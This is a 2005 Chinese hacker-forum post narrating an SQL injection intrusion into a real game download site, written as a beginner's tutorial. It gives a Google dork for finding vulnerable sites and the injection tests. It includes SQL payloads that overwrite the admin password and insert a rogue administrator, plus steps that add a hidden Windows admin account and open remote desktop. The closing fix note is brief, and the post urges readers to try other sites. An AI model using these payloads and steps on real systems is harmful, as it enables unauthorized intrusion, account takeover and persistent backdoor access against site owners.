[原创]SQL注射入侵游戏下载站 |
www. 阅读:
20190 时间:2005-7-5 8:14:13 来源:www. |
[原创]SQL注射入侵游戏下载站
作者:fhod(hackbase)
已经很久没搞入侵了...前不久看了老GUI的一个教程...是入侵下载站的. 首先在www.google.com搜索SendMessages.asp?SoftID= 搜索出了不少站. 约有 27,200 项符合SendMessages.asp?SoftID=的查询结果 有好多站已经补了漏洞.....或许被哪位仁兄捷足先登了...接着随手点了一个连接 来到了一个游戏下载站 http://game./SendMessages.asp?SoftID=625
随手在后面加了个‘ http://game./SendMessages.asp?SoftID=625‘ 返回信息
Microsoft OLE DB Provider for SQL Server 错误 ‘80040e14‘
字符串 ‘‘ 之前有未闭合的引号。
/SendMessages.asp,行72
数据库是SQL的...以前搞access的搞的多了...sql接触的很少..这回有机会了. 为了确保有漏洞 http://game./SendMessages.asp?SoftID=625%20and%201%20=%201 显示正常 http://game./SendMessages.asp?SoftID=625%20and%201%20=%202 虽然没有出错信息.但是细心一看的话就会发现有所不同.
 screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt=‘Click here to open new window‘;}" border=0>
如图1与图2......怎么样...是不是发现有什么不同的地方了. 对,..主题里的软件:(625)牧场物语 的错误报告在 http://game./SendMessages.asp?SoftID=625%20and%201%20=%202 后没有了. 大家在用NBSI和HDSI注入的时候..输入关键字就是这样来的...
不说废话了...下面来进入实站阶段
我用HDSI来检测~图3
 一切顺利...SA权限...dbo用户
猜解表名Admin_UserInfo...最种猜出admin密码为7a57a5a743894a0e...很明显是md5加密后的. 由于是SQL的.我们可以用update来修改管理员密码.
;UPDATE ‘Admin_UserInfo‘ SET ‘password‘ = ‘hackbase‘ WHERE Username=‘admin‘-- 把admin密码修改为hackbase 当然我们还可以加入一个新管理员 ;INSERT INTO ‘Admin_UserInfo‘ (‘UserID‘, ‘Username‘, ‘password‘) VALUES (11,‘fhod‘,‘hackbase‘)-- 用户名fhod密码hackbase的管理员.
用HDSI高级命令执行DOS命令加用户时...发现教主的HDSI有个不足....加入成后 输入 net localgroup administrators看不到我们添加的用户fhod$ 图4..

为了确保我的用户添加成功....又从盘里找出xiaolu写的SQL Commander...这个工具确实不错..再这里感谢xiaolu给我等菜鸟带来这么好的工具...有很多次入侵我都是利用它轻松完成的..
图5.

看图中,...我添加的用户fhod$现在已经在administrators组了..
然后用HDSI的功能给它开了3389.......到这里入侵也应该告一段落了...
此文并没多少新技巧........算是温习一下..写给新手看的... 温故而知新嘛.... 呵.~ 希望高手不要见笑了........
在本文发出去之时...已经通知管理员补漏洞了..大家可以去找别的站来测试...希望不要乱搞破坏
解决方案:如果不熟悉ASP的话..可以去网上找一个"SQL通用防注入程序"来用就可以解决这个问题了. SQL通用防注入程序 http://www./CodeView/CodeView_6882.html
文中用到的SQL Commander sqlcomm.rar" target=_blank>http://www./soft/sqlcomm.rar
|
|